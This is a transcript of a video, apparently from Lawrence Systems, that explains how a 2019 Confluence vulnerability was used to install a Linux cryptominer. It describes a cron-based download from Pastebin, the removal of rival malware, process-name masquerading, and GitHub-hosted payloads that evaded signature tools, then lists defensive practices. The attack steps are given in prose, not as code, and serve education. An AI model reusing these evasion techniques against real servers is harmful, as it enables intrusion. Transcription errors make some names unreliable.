 Confluence is an open and shared workspace. Create, collaborate, and keep all your work in one place. Unlike document and file sharing tools, Confluence is open and accessible, helping your team and your company do their best to work together. If you haven't heard of Confluence, it is a popular shared workspace environment. You know, I was reading the marketing speak here. And it's a popular project. A lot of people have messaged me and said, oh, you should be using Confluence for your stack and et cetera, et cetera. But I chose to use Wiki instead because I do prefer an open source system. And Confluence is reasonable and does very Wiki-like features, but is not open source. Also, from anyone I've talked to that has directly worked with Confluence, they tell me it's rather difficult to update. It's not as easy as just loading an update. Now, this could be subjective based on that, but I know there's companies that told me that they have a lot of problems. So every time they update it, it breaks this, it breaks that, breaks customizations, and it's built on, I believe it's still running all on Apache Tomcat and even installing an SSL is a little bit tricky. And so a lot of people put a proxy in front of it, et cetera, et cetera. Now, like any mature product, this is not a dig on Confluence, but there are security advisories or flaws found, and this is this part of the life cycle and they were properly disclosed. And we have a couple of recent ones in March and April of 2019 here, both of them quite severe critical in the allowed attackers outside if you have this public facing to get in and kind of make a mess of the server. And I'll leave links to all these twos if you wanna read the details of the vulnerability. And I wanted to do a check to see just how many of these Confluence instance Shodan could see public facing. So this is a Shodan search for HTTP component at Lassian Confluence. And wow, there's 22,000 installs. So there's quite a few of these public facing. I bring all this up because frequently people install things, stand up the servers and start using them, but then never ever patch them. And any tool that doesn't have an auto patch management probably needs a technician to patch it, but then they don't wanna spend the money on a technician. And then we get fun writeups like this, ignoring Lassian Confluence security advisories. So, the reason I wanna cover this is to show some of the flaws with signature-based things. And this is really interesting because this was just written and published, well, just the other day, it published on 4.19. And here we are at 4.23, April 23rd, and we still don't have proper detection of some of this and let me explain. So this writeup walks through the exactly each step of this system. First, they pop the, probably the web dev problem in Confluence that allowed them to execute a command on there. They had a Pastebin set up, which is Pastebin's been taken down, but basically they issued a cron job that said, hey, go ahead and download this tool and kick it off. And it looks like the Confluence security advisory, this is the 3.21, so not even the 4.17 Confluence post. So it does this, kicks it off, and I'll leave links to this as well so you can follow through in detail, grabs this. Now, the next step it does is kind of interesting. So this little script it grabs from Pastebin and it adds a cron job to keep running until it gets everything set up. It goes through and looks for other mailware on this server, and I guess it's one of those things that makes a lot of sense when you look at it from this perspective of if I got in a server, probably a lot of other people did get in the server, so let's go ahead and eliminate their mailware because I want my mailware to run. And specifically, this is a crypto miner, which is why they showed the notice was your machine might be pwned because all of a sudden it's under high load and it wasn't before. That's an attack factor sometimes that, well, not attack factor, a notice of attack is the fact that, oh, wow, look, my machine suddenly heavy load or you see a lot of traffic that wasn't there before. Those are indicative of problems. And I'm gonna guess that they weren't running anything like OSAC or Wazoo or any other intrusion detection or trip wire, anything to look for modified files on here that would have let them know that, hey, something just changing a server, did you change it? My guess is they weren't because, well, server load, it sounds like it's the indicator that there was a problem. So the next thing it's gonna do is pull down and figure out what version of Linux it's running and go from there. So it knows, okay, which version of Linux, what is the best tool to load? So it does some detection. Now, I do like that they, instead of the, if you're not familiar, one of the processes is Kerberos that you can have running, it calls itself Kerber odds. And because, you know, it looks close enough in spelling, you might not, you might run a list of applications running, a list of tasks running on the system and go, oh, that looks like Kerberos and just skip over it. Now, this is the part I wanted to talk about is the payload, which is still available on April 23rd on GitHub. And I did some research into this. And so here is the raw GitHub user Atomisa, eight, I don't know, AIKA, we'll just show links here. I'm not good at pronouncing however they want. I don't know how that was supposed to be pronounced or if it was in 125.tmp. And it downloads this file and then it's gonna try to execute this and it runs through and this is the rest of the script. This is the part that gets interesting. And I will further talk real quick though, the mitigation process, do not run software as privileged users, there's some good tips in here, but I will also say I would have nuked and paved the server. Once any server's been popped, grab the database, back it up, reinstall all the applications and put the database back. That's one of your best bets if a server gets popped. That's one thing they did a clean up, but to me, new can pave is one of my favorite ways to deal with servers because you don't know if they left one little file somewhere that you didn't notice, especially if you don't have proper logging and you can't traverse everything they did. But let's talk about that GitHub repository that's still here. So here is the GitHub repository, 125.tmp, 125.mt, 225 and 225.mt and readme, the initial commit. Now, this is one of the challenges. First, they use GitHub. Why did they use GitHub? Because if they use some really weird URL and there was any type of monitoring going on, they would have seen, unusual URL, let's think about that and block it. Why do you, but with GitHub, I like this wide GitHub right at the top right here, GitHub is common for a lot of the scripts we run, including some automated Ansible scripts that I've said before and I've talked about these, like even my .files are on GitHub. And so GitHub doesn't really flag anything. And because most things are encrypted, it becomes very, very hard to see them. But let's break down a little further. I took the URL, this actual download link of the file, raw.githubusercontent and then the link here. And Kaspersky is the only place flagging this as malware. And I thought that was interesting. Now this is URL, not file detection. This is a different animal here. But it's weird that Kaspersky actually does flag it. And this URL was checked on 418. So pretty recently, actually before this other person's published work, but it is a chance that this person is the same person uploaded to here. But yeah, they do find some problem with it. They see there's definitely some type of problem with this. And so Kaspersky flags it while other ones did not. So I thought that was interesting. Now this is a URL flag, not a flag of the actual software. So all these passed that URL perfectly fine. And like I said, you can't just block the, you can't just automatically say I'm gonna block GitHub because well, you would break a lot of scripts out there. So let's go ahead and look at what the file is. And someone has uploaded this file on 421, probably that researcher, but 30 engines do detect this file. But that's not all the engines, some still don't. And this is one of the big problems all the time with using any type of signature based system. We have to wait for these signatures to get on there. But, you know, a lot of things do detect it and a handful of things don't. But I'll give a break to places like malware bites and Microsoft and some of those, not really a break, but they're focused on not Linux back doors, they're focused on Windows detection. So a lot of these, please note that this is a specifically a Linux binary, not a Windows one. So that does make a big difference on the detection or even the desire to have those signatures. I mean, they should have all the signatures, you know, we're doing signature based thing, but the other side of it too, like I said, these are elf binaries. So they're Linux slash, you know, Unix style, not Windows. So not everything's going to do it. But either way, it does find it, does have the load segments as a breakdown of what's inside of it and it does the detection. Next, the 225.tmp. So here's the other file, the 225.tmp. Nothing flags that, not even Kaspersky. So that's still marked as clean. So if someone were to try to filter for any of this, they would still be doing it. Still be able to pull that down on there. And then I pulled up, this is like the payload, how it grabs it, I was just digging in there. So some of the other ones, like .vm, they're not binaries, they're just scripts that, you know, javelling, runtime, pull this, pull this content and run, you know, def 1sh back, you know, how we showed it inside of this here. Now, one of the other things I had tested was I spun up a demo environment and checked Sericata. Even though there's signatures for this file and things like that, this is one of the things I want to make sure we point out, it didn't even, I turned off SSL. I downgraded it and grabbed this file without an SSL just so it Sericata could see it. Nothing, doesn't find it. So, you know, I spun up the VM, downloaded it, pulled it through. And this is one of those things that a lot of people think, oh, but this will protect you. This will, you know, having the firewall and the endpoint and we can just manage with a SIM tool and things like that. And this is one of my points is the first and most important part is keeping your application stack up to date. We've covered this in the how they got hacked videos where the recent hack with one of the, with the matrix, it was all about them not updating one module. One module led to the downfall of everything else because once they get in, traversal becomes a lot easier or, you know, they only popped one server in this particular case based on the write up, but you can still see how much of a problem this is where all the, you can have all the cool, fancy firewall endpoint protection, Saracota pulling full, you know, signatures and everything else. And this has been out for a few days. So sure, there's a signature hopefully for this, that particular file. So it sees the file passing through and it just doesn't flag it. It just goes right through there and not to mention because the signature based, if they have the source code to any of these and frequently the source code too many of these tools gets released, they make one minor change of source code and now the signature doesn't match and now it installs just, just as well. So, yeah, so let's, you know, one time run over again, this mitigation and good practice do not run software as privileged user. This is a huge problem because you gain the permission of whatever the server is. And too many people do this, they don't take the time to figure out why it won't run as its own user or solve whatever problem because it needs access to something. So they just go, I'll just run Apache Tomcat and Confluence as root because it now works perfectly fine. That is, that's the problem. Do not store SSH keys on the server to connect to other servers. That is absolutely critical. Don't leave your SSH keys on there, then allow them to hop to the other servers. That is just important. Follow security advisories and regularly update your operating system. That almost seems obvious. Uninstall unneeded software. You know, least access. This is any time I'm building a server, someone asked if I use a template, no. And the reason I don't, I mean I have like general things I load that I need like log tools and stuff like that. But when it comes to the applications that run on there, is there Samba running on my Wiki server? Absolutely not. It doesn't need it. You slowly build any application server with only the applications you need and not a single one more. Log analysis tools tools are a little bit different because they're not running applications and they also help to have those readily available on the server to go through and parse logs for troubleshooting or to find processes that are running it shouldn't be. But yeah, monitor server and checking log files automatically. And I'll go as far as to saying, you know, having something like Wazoo, Osec, anything, Tripwire, there's different tools you can use to look for modification of server. A cron process added that you didn't add is a bad thing. And how were they able to add a cron process? Well, it was running as root and it gave them the privilege to do so. So this is also, you know, just a few warnings. I hate warning compliments server attack. I like that here. So this is some of the write ups you can read. I'll leave links to all this. So you can do further reading for the investigation. But the basics, and that's one of the things we talk about a lot in the company security. The basics of just keeping the server up to date is enough, well, let's say enough, but is it definitely put you way ahead of the curve of a lot of other people. As generally speaking, when someone's using a lot of these tools, they're automating this, they're pulling a showdown list of 22,000 servers and they go look for all the outdated ones. If you have an updated one, they're like, that's harder. So we'll just let the bot take down all the other ones that are floating around out here that are on patch. So that's why so much of security is sometimes easier than you think. It's complicated to unhack a server. It's complicated to find these things. But keeping your servers up to date and keeping all your stuff on the latest versions and keeping up with these security advisories while it does take some active participation for you to make sure everything gets patched. It is absolutely worth it. And hopefully we're not doing it right up about you or at least here's what you're talking about, your server's getting popped. All right, thanks. And if you want to continue the discussion, head over to our forums. Thanks for watching. If you liked this video, give it a thumbs up. If you want to subscribe to this channel to see more content, hit that subscribe button and the bell icon and maybe YouTube will send you a notice when we post. If you want to hire us for a project that you've seen or discussed in this video, head over to LawrenceSystems.com where we offer both business IT services and consulting services and are excited to help you with whatever project you want to throw at us. Also, if you want to carry on the discussion further, head over to forums.lauranceystems.com where we can keep the conversation going. And if you want to help the channel out in other ways, we offer affiliate links below which offer discounts for you and a small cut for us that does help fund this channel. And once again, thanks again for watching this video and see you next time.